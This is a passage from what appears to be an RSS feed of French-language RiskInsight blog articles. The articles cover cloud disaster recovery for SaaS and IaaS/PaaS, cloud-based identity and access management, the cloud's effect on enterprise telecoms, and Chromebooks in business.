<p>Dans la très grande majorité des cas, les fournisseurs SaaS ne s’engagent pas dans leur contrat sur leur façon de gérer le secours ; même lorsque ceux-ci mettent en avant leur capacité à traiter cette problématique. En effet, les contrats comportent généralement par défaut des clauses de Force Majeure stipulant que le fournisseur n’est pas responsable de manquement aux obligations du contrat dans la mesure où ce manquement est causé par un évènement en dehors de leur contrôle raisonnable. Le risque juridique doit donc être traité lors de la souscription et ces clauses supprimées pour s’assurer un bon niveau de couverture.</p>
<p>Lors de la souscription, comme pour des contrats classiques, les clients doivent s’assurer que figure bien des engagements de service, en particulier pour les secours informatiques :</p>
<ul>
<li>Le <strong>délai de reprise</strong> (Durée Maximale d’Interruption Acceptable ou DMIA) et les <strong>pertes de données</strong> (Perte de Données Maximale Acceptable ou PDMA) en cas de sinistre;</li>
<li>Le <strong>plan de secours informatique du fournisseur incluant les modalités de gestion de crise</strong> ainsi que l’obligation de conduire plusieurs <strong>tests</strong> <strong>probants</strong> par an de ce plan avec la possibilité pour le client d’accès au rapport des tests ;</li>
<li>Les <strong>pénalités financières</strong> et le droit de résilier le contrat (avec en particulier la récupération des données exploitables) en cas de manquement aux engagements.</li>
</ul>
<h2>Le secours informatique du IaaS/PaaS, une mise en oeuvre et une responsabilité du client</h2>
<p>Le IaaS (<em>Infrastructure as a Service</em>) est une offre standardisée et automatisée de ressources de calcul, de moyens de stockage et de ressources réseau détenus et hébergés par un fournisseur et mis à disposition au client à la demande. L’offre PaaS (<em>Platform as a Service</em>) est similaire à celle du IaaS, à la différence près qu’elle ne concerne que les infrastructures applicative (définitions Gartner)<a href="#_ftn1" name="_ftnref1"></a> Contrairement au cas du SaaS, le secours reste sous la responsabilité du client dans les deux cas : les fournisseurs IaaS/PaaS mettent à disposition des ressources dans différents datacenters et le client est responsable de l’usage et de la configuration qu’il en fait. Deux solutions s’offrent aux clients utilisant ces services : confier à un prestataire son secours ou bien le gérer lui-même.</p>
<h3>Avoir recours à un prestataire de secours, un marché peu mature<strong><br />
</strong></h3>
<p>Les prestataires de secours dans le Cloud sont désignés par l’acronyme « DRaaS » pour <em>Disaster Recovery as a Service</em>. Initialement, les fournisseurs DRaaS proposaient d’assurer dans le Cloud le secours de votre SI « on-premise ». Mais ils proposent également aujourd’hui d’assurer le secours de vos infrastructures déjà dans le Cloud, AWS ou Azure par exemple. La maturité reste très variable selon les fournisseurs et le cloud utilisé. Certains fournisseurs DRaaS imposent que le Cloud de destination du secours soit le leur, ne permettant pas ainsi de couvrir le secours de service PaaS.</p>
<p>Comme avec le SaaS, <strong>pas de garanties incluses</strong> <strong>par défaut</strong> quant aux pertes de données ou au délai de reprise, il faut les négocier. Les fournisseurs promettent de pouvoir s’adapter aux exigences du client ! Pour s’assurer que le secours fonctionne, le client doit prévoir la réalisation régulière de <strong>tests probants du secours </strong>(recommandation d’une fois par an).</p>
<h3>Réaliser soi-même son secours en utilisant les outils proposés par le fournisseur<strong><br />
</strong></h3>
<p>Comme sur une infrastructure « on-premise », il est nécessaire de réfléchir et définir sa stratégie de secours dès la conception. Cette stratégie doit intégrer la capacité de réaliser des tests probants permettant d’assurer un niveau de confiance suffisant dans son plan.</p>
<p>La mise en place est simplifiée par les outils mis à disposition par les fournisseurs Cloud et la forte standardisation des environnements Cloud. Les grands acteurs publient dans des livres blancs les grandes lignes directrices pour mettre en place un tel projet (par exemple <a href="https://d0.awsstatic.com/International/fr_FR/whitepapers/aws-disaster-recovery.pdf.pdf">AWS</a> ou <a href="https://docs.microsoft.com/en-us/azure/architecture/resiliency/disaster-recovery-azure-applications">Azure</a>).</p>
<p><strong>Les concepts des stratégies du secours informatique restent proches de celles pour les datacenters on-premise.</strong></p>
<p>On peut en dénombrer quatre principales :</p>
<ul>
<li><strong>la sauvegarde et restauration</strong>: simple sauvegarde des données et images des machines sur un site distant, restaurées en cas de sinistre ;</li>
<li><strong>la veilleuse</strong>: réplication des bases de données et mise à disposition des machines sous forme d’images prêtes à être démarrées en cas de sinistre ;</li>
<li><strong>le secours à chaud</strong>: réplication complète du site primaire (données et machines), le site de secours est sous-dimensionné en termes de performances et est prêt à monter en charge en cas sinistre ;</li>
<li><strong>le multi site (ou actif-actif)</strong>: les deux sites sont identiques et se partagent la charge des utilisateurs. En cas de sinistre, le site restant peut monter en charge pour accueillir la totalité des utilisateurs.</li>
</ul>
<p>Des solutions hybrides pouvant mieux s’adapter aux exigences de délai de reprise, coût et complexité de la solution peuvent être envisagées.</p>
<p><strong>Le véritable apport du Cloud pour le secours concerne les nombreux outils mis à disposition simplifiant la mise en œuvre et le déclenchement. </strong></p>
<p>La réplication des données est ainsi simplifiée pour les options de géo-réplication asynchrones (plusieurs copies répliquées dans d’autres régions). La PDMA est variable en fonction des types de données et des outils proposés. Au-delà de cette option, une redondance locale des données est presque systématiquement incluse.</p>
<p>La forte standardisation permet également d’automatiser la reprise : les scripts ou API mis à disposition par les fournisseurs permettent d’automatiser le déploiement des infrastructures, le redimensionnement des instances en fonction de métriques précédemment définies, la répartition des charges et du trafic ou, l’adressage IP etc… afin d’accélérer de façon significative l’activation d’un site de secours.</p>
<p>Les outils de surveillance et alerte qui sont également proposés visent à faciliter le Maintien en Conditions Opérationnelles (MCO) du secours et peuvent être utilisés pour détecter au plus tôt un incident voire, dans certains cas, automatiser partiellement le déclenchement du secours.</p>
<p>Enfin la capacité à provisionner des nouvelles ressources en quelques minutes permet de limiter l’OPEX. <strong>A stratégie équivalente, il est ainsi possible d’avoir des gains de 40 à 70% sur le coût du secours !</strong></p>
<h3>Vers une plus grande prise en charge par le fournisseur ?<strong><br />
</strong></h3>
<p>Azure prévoit une <a href="https://docs.microsoft.com/fr-fr/azure/site-recovery/site-recovery-azure-to-azure">option</a>, courant 2017, pour assurer le secours des machines virtuelles hébergées au sein de leur plateforme via la complétion de leur service « Site Recovery ». En effet, « Site Recovery » propose à l’heure actuelle de prendre en charge le secours de site traditionnel en utilisant le cloud Azure pour accueillir le site secondaire, mais Microsoft souhaite étendre ce service au secours de leurs propres infrastructures. Cet outil permettrait un déploiement automatique du site secondaire (de type actif-passif), une réplication automatique des données et une mise en place de tests facilitée.</p>
<p>Cette option est passée en « public preview » fin mai 2017. Un projet équivalent n’est pas d’actualité chez les autres principaux fournisseurs IaaS/PaaS.</p>
<h2>Le cloud face au risque systémique des fournisseurs</h2>
<p>Le secours informatique des services hébergés dans le cloud s’aborde différemment selon le type de service utilisé. Le secours du SaaS doit être géré contractuellement et est sous la responsabilité du fournisseur tandis que le secours du IaaS/PaaS, simplifié par les outils, reste sous la responsabilité du client.</p>
<p>Le risque de défaillance généralisé d’une région d’hébergement d’un fournisseur existe comme le montre les derniers incidents. Même si aujourd’hui, les incidents ont été de courte durée ou avec des impacts fiables, une défaillance généralisée ne peut pas être ignorée. Reste donc à traiter la problématique de cyber-résilience. L’utilisation d’un 2<sup>ème</sup> fournisseur cloud permet de couvrir le risque de destruction ou d’indisponibilité majeure des infrastructures du premier. Cette solution reste très complexe car la portabilité d’un fournisseur à un autre est délicate. Pour l’instant, peu d’entreprises s’y sont risquées, même si l’on peut citer l’exemple de <a href="http://www.usine-digitale.fr/article/snap-se-repose-sur-le-cloud-d-amazon-pour-la-redondance-de-son-systeme-d-information.N499899">Snapchat</a> qui utilise le cloud Google pour sa production et prévoit d’utiliser celui d’Amazon pour son secours d’ici à 5 ans.</p>
<p>&nbsp;</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2017/08/le-cloud-la-fin-ou-renouveau-du-secours-informatique/">Le Cloud, la fin ou renouveau du secours informatique ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>IAM dans le Cloud : est-ce le moment de se lancer ?</title>
		<link>https://www.riskinsight-wavestone.com/2016/01/iam-dans-le-cloud-est-ce-le-moment-de-se-lancer/</link>
		
		<dc:creator><![CDATA[Bertrand Carlier]]></dc:creator>
		<pubDate>Wed, 13 Jan 2016 09:29:20 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Digital Identity]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[digital identity tomorrow]]></category>
		<category><![CDATA[IAM]]></category>
		<category><![CDATA[IAMaaS]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=8694</guid>

					<description><![CDATA[<p>La demande croissante de réduction des coûts d’une part et la maturité de l’offre d’autre part poussent de plus en plus les entreprises au choix des solutions cloud, y compris dans le domaine de l’Identity Access Management (IAM). Le principal...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2016/01/iam-dans-le-cloud-est-ce-le-moment-de-se-lancer/">IAM dans le Cloud : est-ce le moment de se lancer ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>La demande croissante de réduction des coûts d’une part et la maturité de l’offre d’autre part poussent de plus en plus les entreprises au choix des solutions cloud, y compris dans le domaine de l’Identity Access Management (IAM).</em></p>
<p><em>Le principal frein rencontré jusqu’ici était de voir toutes ses données externalisées. Ce frein est petit à petit en train de disparaître lorsque l’on se rend compte qu’elles le sont déjà. En effet, le système RH comme le CRM sont, pour bon nombre d’entreprises, déjà dans le cloud ! Les données critiques liées au métier de l’entreprise sont elles-mêmes déjà externalisées à travers les solutions de messagerie et autres suites collaboratives en mode SaaS. Pour quelles raisons l’IAM échapperait-il à cette révolution ?</em></p>
<h2>Identity Access Management As A Service (IAMaaS) : qu’est-ce que cela représente réellement ?</h2>
<p>Les offres d’IAM en cloud permettent de gérer et fédérer différentes ressources. Si elles sont bien utilisées, elles peuvent être un vrai accélérateur pour les métiers de l’entreprise. Mais comme tout service dans le cloud, il y a des avantages (coûts, mises à jour régulières, etc.) et des inconvénients (contrôle des données, protocoles et formats parfois non standards, etc.).</p>
<p>Les clients et les partenaires, tout comme les employés ou prestataires, peuvent bénéficier de la fédération d&rsquo;identités. De même, des connecteurs spécifiques sont mis en œuvre pour les applications SaaS ou <em>on-premises</em>, utilisées par l&rsquo;entreprise. Les utilisateurs peuvent se connecter via n&rsquo;importe quel type de terminal. Il reste quelques incontournables pour profiter pleinement d’un IAMaaS et en garder la maîtrise : la capacité de faire des revues de comptes, la disponibilité des connecteurs de <em>provisioning</em> vers les applications et la maîtrise de l’envoi dans le cloud de données à caractère personnel.</p>
<h2>Externalisation de l’IAM : penser avant tout à la maturité du SI</h2>
<p>La capacité du SI à adopter des standards et des protocoles ouverts est un sujet clé pour réussir un déploiement d’IAM dans le cloud.</p>
<p>Il faut donc, après avoir choisi un premier périmètre d&rsquo;application, s&rsquo;assurer que ce dernier respecte les normes et bonnes pratiques en vigueur concernant l&rsquo;authentification et la gestion des identités. De même l’existence d&rsquo;un référentiel interne centralisé, afin de communiquer avec la solution d&rsquo;IAM, sera nécessaire dans la majorité des cas.</p>
<p>Enfin, en prenant la problématique dans l’autre sens, c’est aussi une opportunité de fournir très rapidement aux nouveaux projets une plate-forme mâture supportant les derniers standards : fédération, authentification mobile, <em>provisioning</em>, etc.</p>
<h2>Anticiper les risques : plus qu’un besoin, une nécessité</h2>
<p>En comparaison avec des solutions <em>on-premises</em>, certains risques seront couverts de la même manière voire potentiellement mieux par une solution cloud : la disponibilité du système et la compromission des données. Les fournisseurs sont souvent plus mâtures que l’entreprise sur le sujet de la résilience des infrastructures et ont anticipé le cloisonnement vis-à-vis des administrateurs dès la conception du service.</p>
<p>D’autres risques doivent en revanche être spécifiquement adressés comme :</p>
<ul>
<li>Laréversibilité: il faut s’assurer qu’il est possible à tout moment de récupérer ses données dans un format exploitable et il ne faut faire aucun compromis sur l’utilisation de standards.</li>
<li>L’isolation des données: cette dernière est parfois très difficile, voire impossible à contrôler ; néanmoins il est possible de s’assurer de manière contractuelle de l’isolation de ses données par rapport aux autres clients du fournisseur.</li>
<li>La conformité: dans le cadre de certaines obligations (CNIL notamment) il est nécessaire de s’assurer que les données externalisées seront hébergées dans le respect de la norme (en Europe pour la CNIL). Une approche face à cela est de recourir au chiffrement des données avant envoi mais ce n’est pas forcément simple à exploiter dans une solution IAM.</li>
</ul>
<h2>Une opportunité pour moderniser son IAM</h2>
<p>L’IAMaaS est une réelle opportunité qui permet d’offrir un service stable, standard et moderne aux différents métiers de l’entreprise.</p>
<p>De même, les utilisateurs étant habitués aux applications en cloud (accessibles partout, tout le temps et depuis tout terminal), la mise en place d&rsquo;une fédération gérée par l&rsquo;IAM en cloud et d&rsquo;un portail IAM de ce type ne perturbera pas, ou très peu, leurs habitudes.</p>
<p>Enfin, en plus de des interfaces simples et efficaces proposées aux utilisateurs, les solutions d’IAMaaS mettent à disposition des API REST modernes, adaptés aux applications web (HTML5/Angular.js) ou aux applications mobiles, permettant à celles-ci d’interagir directement dans la gestion des identités. De quoi accompagner la transformation numérique que toute entreprise aborde aujourd’hui.</p>
<p>De nombreux acteurs sont aujourd’hui sur ce marché actif et l’offre fonctionnelle est très riche : Okta, Salesorce, Microsoft, Ping Identity, Memority, RSA, Cap Gemini, etc.</p>
<p>L’option cloud est aujourd’hui incontournable – ne serait-ce qu’en phase de cadrage IAM – et il faut désormais justifier la pertinence et le besoin de rester sur des infrastructures <em>on-premises</em>.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2016/01/iam-dans-le-cloud-est-ce-le-moment-de-se-lancer/">IAM dans le Cloud : est-ce le moment de se lancer ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Cloud : vers le renouvellement des services télécoms ?</title>
		<link>https://www.riskinsight-wavestone.com/2014/10/cloud-vers-renouvellement-services-telecoms/</link>
		
		<dc:creator><![CDATA[Stephane Thellier]]></dc:creator>
		<pubDate>Wed, 15 Oct 2014 09:07:39 +0000</pubDate>
				<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Télécoms]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=5854</guid>

					<description><![CDATA[<p>Le cloud facilite la mise en place de nouveaux services télécoms. Mais s’il rend les équipes télécoms plus agiles (diminution du temps de mise en place, des coûts…), il permet aussi dans certains cas aux clients internes de se passer...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/10/cloud-vers-renouvellement-services-telecoms/">Cloud : vers le renouvellement des services télécoms ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="http://www.solucominsight.fr/category/dossiers/cloud-computing/"><i>Le cloud</i></a><i> facilite la mise en place de nouveaux services télécoms. Mais s’il rend les équipes télécoms plus agiles (diminution du temps de mise en place, des coûts…), il permet aussi dans certains cas aux clients internes de se passer de la DSI. Il est donc impératif pour le responsable télécoms d’étudier ces offres, voire de les intégrer à son catalogue de services pour mieux répondre aux besoins de ses clients et éviter le recours à des solutions alternatives non maîtrisées.</i></p>
<p>Le <i>cloud</i> n’a cependant pas le même impact sur toutes les composantes des télécoms.</p>
<h2>L’audioconférence et la webconférence, services <i>early adopters</i> du <i>cloud</i></h2>
<p>Les services d’audioconférence et de webconférence sont désormais quasi-exclusivement fournis en mode SaaS. Ces services étant relativement simples à acheter et à mettre en place, il n’est pas rare qu’il y ait plusieurs contrats pour un même service au sein d’une même entreprise.</p>
<p>Les fournisseurs de solutions de communications unifiées veulent se positionner en concurrent de ces solutions. Pour autant, les problématiques d’interopérabilité de ces solutions pour communiquer entre des entreprises différentes font que les services SaaS restent aujourd’hui leaders de ce domaine.</p>
<h2>Des centres de relation client qui s’appuient de plus en plus sur des services <i>cloud</i></h2>
<p>Les problématiques de centres de relation client sont souvent portés par les métiers ou par les DSI les plus proches des métiers.</p>
<p>Le marché montre aujourd’hui un mouvement vers des solutions <i>cloud</i>. Si les prix sont bien évidemment un moteur de cette évolution, pouvoir permettre aux métiers de faire évoluer facilement la configuration fonctionnelle et ne pas avoir besoin de compétences pointues en interne favorise l’adoption du <i>cloud.</i></p>
<p>Il est à noter que, pour les CRC, la dépendance vis-à-vis des fournisseurs est forte. Soit parce que la solution est en mode <i>cloud</i> et que la réversibilité est complexe, soit parce qu’il y a forte dépendance vis-à-vis de l’éditeur si la solution est internalisée. Le critère de dépendance vis à vis d’un fournisseur n’est donc pas discriminant pour le choix d’une solution. Ceci explique probablement pourquoi ce mouvement d’adoption des solutions <i>cloud</i> est aussi net alors même que les solutions sont amenées à fortement évoluer sous la pression des projets de transformation numérique.</p>
<h2>Le <i>cloud</i>, accélérateur de services : la vidéoconférence de salle</h2>
<p>La vidéoconférence de salle s’est profondément renouvelée avec l’apparition de nouvelles offres de service reposant sur le <i>cloud.</i> Si le <i>cloud </i>n’est pas à lui seul la source du renouveau de la vidéoconférence, il a néanmoins permis son enrichissement fonctionnel et une amélioration de l’expérience client.</p>
<p>Il est possible de distinguer deux types de vidéoconférence : la vidéoconférence immersive et la vidéoconférence de salle.</p>
<p>La vidéoconférence immersive étant un service récent destiné aux VIP, elle reste un service transverse aux différentes branches de l’entreprise que la DSI groupe est la plus légitime à fournir. Pour les solutions immersives, les clients optent fréquemment pour des solutions clé en main reposant sur le <i>cloud</i>, notamment en raison d’un périmètre relativement faible de salles, d’utilisateurs VIP et de contraintes budgétaires moins fortes que sur la visioconférence classique.</p>
<p><i>A contrario</i>, l’impact du <i>cloud </i>sur la vidéoconférence classique est plus modéré. Le marché passe d’un modèle intégré à un modèle infogéré plutôt qu’à un modèle <i>cloud</i>. Ceci s’explique par le poids de l’existant et les volumes considérés.</p>
<h2>Télécoms industrielles : le <i>cloud</i>, pilier de la nouvelle révolution</h2>
<p>Les solutions industrielles s’appuient sur deux piliers : des solutions télécoms innovantes et des services <i>cloud</i> le plus souvent capables de traiter un grand volume de données. Le Big Bata jouera un rôle clé dans cette révolution.</p>
<h2>La vidéo sur le poste de travail : le <em>cloud</em> peut-il en favoriser l’émergence ?</h2>
<p>Les services de vidéo sur le poste de travail se développent notamment chez les grands comptes avec des équipes réparties dans le monde entier, en complément d’une vidéoconférence de salle ou lors de la mise en place de projets de communications unifiées.</p>
<p>Le <i>cloud</i> pourrait faciliter l’émergence de ces usages, notamment en facilitant les <i>Proof of Concept</i>. Ceci est d’autant plus vrai qu’il existe des services d’interconnexion <i>cloud</i> permettant de relier ces solutions sur postes de travail à d’autres moyens de communication comme la vidéoconférence.</p>
<h2>La téléphonie, toujours plus externalisée, mais pas encore dans le <em>cloud</em></h2>
<p>Les solutions de téléphonie des grandes entreprises sont maintenant très majoritairement des solutions IP. Le mouvement vers l’IP étant bien amorcé, les organisations associées sont également en cours de transformation. La téléphonie a déjà basculé des services généraux vers les équipes SI. En parallèle, la plus grande criticité des systèmes centralisés et le recours à une expertise nouvelle fait que l’exploitation de la téléphonie a dû être renforcée. Ce renforcement passe souvent par une externalisation de tout ou partie de la téléphonie. De fait, la téléphonie est de plus en plus souvent infogérée.</p>
<p>Pour autant, cette externalisation ne va pas jusqu’au <i>cloud</i> : la téléphonie en mode<i> cloud </i>public n’a toujours pas percé chez les grandes entreprises. Néanmoins, une nouvelle génération de téléphonie dans le <i>cloud</i> émerge aujourd’hui : promesses de gains plus élevées, limitations fonctionnelles moins nombreuses, intégration de fonctionnalités de communications unifiées&#8230; Le service, qui reste très jeune, connaîtra peut-être un décollage dans les années à venir.</p>
<p><i>En conclusion, le cloud est présent sur de plus en plus de services télécoms que ce soit des services à l’utilisateur ou des télécoms métier. C’est une opportunité pour le responsable télécoms de développer de nouveaux services et d’apporter plus de valeur aux utiliseurs. Il semble d’autant plus nécessaire pour lui de se positionner en offreur de services innovants que les métiers seront tentés de se passer de la DSI pour les acheter &#8211; au détriment des bonnes pratiques de gouvernance. </i></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/10/cloud-vers-renouvellement-services-telecoms/">Cloud : vers le renouvellement des services télécoms ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Comment le cloud bouscule les télécoms de l’entreprise</title>
		<link>https://www.riskinsight-wavestone.com/2014/10/comment-cloud-bouscule-les-telecoms-lentreprise/</link>
		
		<dc:creator><![CDATA[Stephane Thellier]]></dc:creator>
		<pubDate>Fri, 03 Oct 2014 14:05:55 +0000</pubDate>
				<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Télécoms]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=5812</guid>

					<description><![CDATA[<p>Le cloud va profondément modifier des télécoms déjà en constante évolution. Il amène de nouvelles exigences, comme la nécessité d’accéder aux clouds publics de manière performante et ouvre de nouvelles opportunités. Un changement qui pousse notamment les responsables télécoms à...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/10/comment-cloud-bouscule-les-telecoms-lentreprise/">Comment le cloud bouscule les télécoms de l’entreprise</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em><a href="http://www.solucominsight.fr/category/dossiers/cloud-computing/">Le</a></em><i><a href="http://www.solucominsight.fr/category/dossiers/cloud-computing/"> cloud</a> va profondément modifier des télécoms déjà en constante évolution. Il amène de nouvelles exigences, comme la nécessité d’accéder aux clouds publics de manière performante et ouvre de nouvelles opportunités. Un changement qui pousse notamment les responsables télécoms à faire évoluer les compétences de leurs équipes et à adapter leur organisation.</i></p>
<p>Pour rappel, les télécoms sont composées de services d’infrastructure (réseaux intersites : WAN et MAN, collecte de la voix, accès internet, accès partenaires), de services d’infrastructure site (réseaux locaux et réseaux internes aux datacenters, wifi), de services utilisateurs (téléphonie, nomadisme, mobilité, communications unifiées, audioconférences, webconférences, vidéoconférences) et de services métiers (télécoms industrielles, centre de relation client, mobilité métier).</p>
<h2>Une infrastructure télécom qui doit s’adapter pour être <i>cloud-ready</i></h2>
<h4>Repenser la place de l’internet</h4>
<p>Avec l’arrivée du <i>cloud</i>, de plus en plus de ressources ne se situent plus dans les sites ou <i>datacenters</i> de l’entreprise mais sur des plates-formes mutualisées situées chez des partenaires. La messagerie, le SIRH ou les webconférences ont déjà amorcé ce mouvement. Ceci signifie que les flux évoluent.</p>
<p>En premier lieu, le volume des flux transportés entre les sites augmente. Des flux à destination de serveurs locaux sont devenus des flux à destination de serveurs distants. Il n’est pas rare que les migrations de messagerie dans le <i>cloud</i> déclenchent des <i>upgrades</i> réseaux massifs.</p>
<p>Ensuite, les flux vers l’extérieur se développent. Le besoin d’accès fiables et performants à internet est renforcé. À titre d’exemple, 50 à 80% des flux d’un grand compte industriel utilisant fortement le cloud sont à destination d’internet.</p>
<p>Enfin, les flux, y compris critiques, ne circulent plus uniquement sur un réseau interne à l’entreprise, mais sont également à destination de l’extérieur, et donc d’internet.</p>
<p>Gérer ces flux implique souvent de décentraliser une partie des accès internet et de s’assurer de la bonne performance de la solution tout en garantissant le niveau de sécurité nécessaire. Deux tendances émergent aujourd’hui : la première consiste à souscrire à un accès <i>into the cloud</i> tout en externalisant tout ou partie de la sécurité. La seconde consiste à disposer d’accès internet directement sur site ; ce sont les solutions dites hybrides ou d’internet <i>off-load</i>.</p>
<h4>Construire son propre nuage : le cloud privé</h4>
<p>Si la terminologie <i>cloud</i> sous-entend souvent <em>cloud</em> public, il existe également des <i>clouds </i>privés ou <i>clouds</i> hybrides. Dans ces cas, il est nécessaire de mettre en œuvre de nouvelles solutions réseaux pour s’adapter à la virtualisation des ressources de <i>datacenters</i> et à la cohabitation entre les <i>clouds </i>publics et privés. C’est pourquoi nos clients rénovent aujourd’hui la plupart de leurs solutions LAN DC. Dans ces projets, les frontières entre les télécoms, la sécurité et le reste de l’infrastructure deviennent de plus en plus floues aussi bien en termes d’infrastructures que de compétences.</p>
<h2>Une organisation à adapter au <i>cloud</i> : renforcer les fonctions d’architecte, de responsable client et de responsable fournisseur</h2>
<h4>Un département architecture plus fortement sollicité</h4>
<p>La mise en place d’un réseau <i>cloud-ready</i> pose de nouvelles questions d’architecture télécoms et sécurité liées aux changements de matrice de flux, au design des solutions hybrides et à leur sécurisation. Le LAN DC nécessite également une forte implication des architectes.</p>
<p>Ces dernières années, les solutions MPLS et les accès internet ont été relativement stables et ont assez peu sollicité les architectes. Cela change avec l’arrivée du <i>cloud</i>, ce qui confirme l’importance du rôle d’architecte référent.</p>
<h4>Le cloud impose de se rapprocher de ses clients internes</h4>
<p>Comme nous l’avons souligné plus haut, le <em>cloud</em> permet aux clients de s’affranchir plus facilement des services de la DSI. Par exemple, les directions métiers n’ont pas besoin de la DSI pour souscrire à une solution de webconférence. Le client doit devenir une des préoccupations du responsable télécoms. Les responsables clients doivent être clairement identifiés pour fluidifier les relations.</p>
<p>Il devient de plus en plus nécessaire de disposer d’un catalogue de service télécoms et d’être en mesure de le faire évoluer. Nous constatons l’apparition d’un véritable rôle de chef de produit chez nos clients de manière à être plus réactif vis-à-vis des demandes des clients internes.</p>
<p>Par ailleurs, pour être en phase avec la logique de service attendue des clients pour les services utilisateurs, les offres télécoms ne peuvent plus se limiter à des solutions techniques, elles doivent intégrer les notions d’ergonomie, support et facilité d’utilisation qui sont souvent des facteurs clés de succès d’une offre télécom. Les rôles de responsable client et de chef de produit prennent de l’ampleur. Il sera parfois nécessaire de faire évoluer la gouvernance entre la DSI et ses clients pour permettre à ces rôles de prendre leur place.</p>
<h4>Le <i>cloud </i>impose une gestion fournisseur plus complexe</h4>
<p>Le cloud est bien une forme d’externalisation. Les services externalisés tendent à être de plus en plus nombreux et de moins en moins standards nécessitant de plus en plus de customisation. La réversibilité devient de plus en plus complexe (par exemple, les centres d’appels) et la dépendance vis-à-vis du fournisseur importante. La contractualisation de ses services doit faire l’objet d’une attention particulière pour prendre en compte ces points, ainsi que l’évolutivité des services et la maîtrise des coûts.</p>
<p>Le pilotage des fournisseurs devient donc de plus en plus complexe et la culture du « faire-faire », un savoir-faire important. Le rôle de pilotage des fournisseurs s’affirme donc comme un rôle clé.</p>
<p><i>En conclusion, le cloud nécessite une adaptation des infrastructures télécoms au niveau du réseau intersites (WAN) et dans les datacenters. Il fait ainsi émerger de nouveaux rôles ou renforce l’importance de certaines fonctions. L’organisation de la DSI devra en tenir compte, de manière à renforcer les rôles d’architecte, de pilotage des fournisseurs et rendre audible la voix du client interne.</i></p>
<p><em> Découvrez bientôt sur Solucom Insight l’impact du cloud sur le renouvellement des services télécoms.</em></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/10/comment-cloud-bouscule-les-telecoms-lentreprise/">Comment le cloud bouscule les télécoms de l’entreprise</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Chromebook : le PC Cloud de Google à l’assaut des entreprises</title>
		<link>https://www.riskinsight-wavestone.com/2014/09/chromebook-pc-cloud-google-lassaut-entreprises/</link>
		
		<dc:creator><![CDATA[Dhrishti Caleechurn]]></dc:creator>
		<pubDate>Mon, 08 Sep 2014 10:06:23 +0000</pubDate>
				<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[chromebook]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Google]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=5761</guid>

					<description><![CDATA[<p>Après Google Apps et ses terminaux sous Android, Google poursuit son offensive dans l’environnement de travail en s&#8217;attaquant au marché des PC avec ses Chromebook. Malgré un départ timide depuis leur commercialisation en 2011, Google persévère en multipliant les partenariats...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/09/chromebook-pc-cloud-google-lassaut-entreprises/">Chromebook : le PC Cloud de Google à l’assaut des entreprises</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><i>Après Google Apps et ses terminaux sous Android, Google poursuit son offensive dans l’environnement de travail en s&rsquo;attaquant au marché des PC avec ses <a href="http://www.google.com/intl/fr_fr/chrome/devices/">Chromebook</a>. Malgré un départ timide depuis leur commercialisation en 2011, Google persévère en multipliant les partenariats et commence à susciter l’intérêt en entreprise.</i></p>
<h2><b>Des ventes modestes mais des perspectives intéressantes</b></h2>
<p>Les ventes de Chromebook restent faibles : 2,9 millions d’unités ont été vendues en 2013 sur un marché total de 317 millions de PC, soit moins de 1% du marché. Elles sont également très ciblées, puisqu’elles se concentrent principalement en Amérique du Nord sur le marché de l’éducation.</p>
<p>Néanmoins, selon le cabinet d’étude Gartner, le marché du Chromebook devrait voir ses ventes augmenter de 79 % en 2014 par rapport à 2013 et <a href="http://www.boursier.com/actualites/economie/plus-de-5-millions-de-chromebooks-google-vendus-cette-annee-24946.html">les ventes devraient tripler d’ici 2017 pour atteindre 14,4 millions d’unités.</a> Des chiffres relativement modestes mais en contraste avec un marché du PC en berne.</p>
<h2><b>Le Chromebook concrétise la vision du PC selon Google</b></h2>
<p>Pour Google, un PC sert avant tout à utiliser des applications web sur internet. Dans cette optique, le géant de Mountain View a conçu Chrome OS, un système d’exploitation léger basé sur son navigateur Chrome. L’interface est minimale et épurée, privilégiant la simplicité et la réactivité. Chrome OS est conçu principalement pour un usage connecté : il permet d’exécuter des applications Web… en particulier les services fournis par Google : Google Apps, Google Play, Google Print…</p>
